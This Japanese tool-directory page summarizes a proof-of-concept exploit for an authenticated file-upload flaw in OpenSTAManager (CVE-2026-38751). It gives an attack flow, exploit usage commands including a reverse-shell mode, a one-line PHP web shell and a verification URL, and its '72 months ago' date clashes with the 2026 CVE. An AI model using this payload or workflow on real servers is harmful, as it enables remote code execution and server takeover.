Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-38751-OpenSTAManager-Arbitrary-File-Upload-PoC — このリポジトリには、OpenSTAManager ≤ 2.10 に影響する CVE-2026-38751 用の概念実証 (PoC) エクスプロイトが含まれています。この脆弱性により、認証された攻撃者がモジュール更新機能を介して悪意のあるモジュールをアップロードでき、任意のファイルアップロードとリモートコード実行 (RCE) につながります。 | Kitploit
ツール/GitHubGitHub/mkps/cve-2026-38751-openstamanager-arbitrary-file-upload-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubmkps/cve-2026-38751-openstamanager-arbitrary-file-upload-poc

CVE-2026-38751-OpenSTAManager-Arbitrary-File-Upload-PoC

このリポジトリには、OpenSTAManager ≤ 2.10 に影響する CVE-2026-38751 用の概念実証 (PoC) エクスプロイトが含まれています。この脆弱性により、認証された攻撃者がモジュール更新機能を介して悪意のあるモジュールをアップロードでき、任意のファイルアップロードとリモートコード実行 (RCE) につながります。

リポジトリを見る
72ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-38751 – OpenSTAManager 任意ファイルアップロード (PoC)

このリポジトリには、OpenSTAManager ≤ 2.10 に影響する CVE-2026-38751 の概念実証 (PoC) エクスプロイトが含まれています。この脆弱性により、認証済みの攻撃者がモジュール更新機能を介して悪意のあるモジュールをアップロードでき、任意のファイルアップロードとリモートコード実行 (RCE) につながります。

CVE リファレンス

  • MITRE CVE エントリ (最初の公開レコード): https://www.cve.org/CVERecord?id=CVE-2026-38751
  • NVD (NIST) 脆弱性データベース: https://nvd.nist.gov/vuln/detail/CVE-2026-38751
  • GitHub Advisory Database https://github.com/advisories/GHSA-rm34-fg4m-39mw

影響を受けるソフトウェア

  • OpenSTAManager ≤ 2.10
  • モジュール更新システム (modules/aggiornamenti/upload_modules.php)

脆弱性の説明

モジュール更新機能は、認証済みユーザーがファイルの内容や実行境界を適切に検証せずに ZIP ベースのモジュールをアップロードすることを許可します。攻撃者は PHP ペイロードを含む悪意のあるモジュールを細工でき、これらは Web ルートに展開され、アプリケーションコンテキストを介して実行されます。その結果、次のことが発生します:

  • 任意のファイルアップロード (CWE-434)
  • アップロードされた PHP ファイルを介したリモートコード実行
  • アプリケーションコンテキストの完全な侵害

攻撃フロー (概要)

  1. OpenSTAManager に認証する
  2. 細工したモジュール ZIP アーカイブをアップロードする
  3. モジュールのインストール/更新プロセスをトリガーする
  4. Web ルートを介してアップロードされた PHP ペイロードにアクセスする
  5. サーバー上で任意のコマンドを実行する

影響

悪用に成功すると、以下が可能になります:

  • リモートコマンド実行
  • Web サーバーの侵害
  • データの外部漏えい
  • 権限に応じたアプリケーションの完全な乗っ取り

要件

  • 有効な認証済みユーザーアカウント
  • モジュール更新機能へのアクセスが有効であること

使用方法 (PoC)

  1. 悪意のあるモジュールを生成する
python exploit.py --build

以下を作成します:

update.zip
└── run/
    ├── MODULE
    └── evil.php
  1. エクスプロイトを実行する
python exploit.py <username> <password> <target_url>

オプションのリバースシェルモード:

python exploit.py <username> <password> <target_url> --lhost <IP> --lport <PORT>

ペイロード例

<?php
isset($_GET['cmd']) && system($_GET['cmd']);
?>

検証

成功した場合、次のエンドポイントがシステムコマンドを実行します: /modules/run/evil.php?cmd=id

MITRE / NVD リファレンス

  • MITRE CVE レコード: https://www.cve.org/CVERecord?id=CVE-2026-38751
  • NVD エントリ: https://nvd.nist.gov/vuln/detail/CVE-2026-38751

免責事項

このプロジェクトは以下を目的としています:

  • 教育目的
  • 許可されたセキュリティテスト
  • 研究環境

明示的な許可なしにシステムに対して使用しないでください。

注意事項

検出はサーバー設定によって異なる場合があります。 一部のデプロイメントでは、モジュールディレクトリでの PHP の直接実行が無効になっている場合があります。 モジュールのアクティベーションのタイミングによっては、リトライが必要になる場合があります。

謝辞

  • MITRE CVE プログラム
  • NIST National Vulnerability Database (NVD)
  • OpenSTAManager プロジェクトメンテナー
  • https://github.com/fuutianyii/poc (最初の PoC)
ツールをダウンロード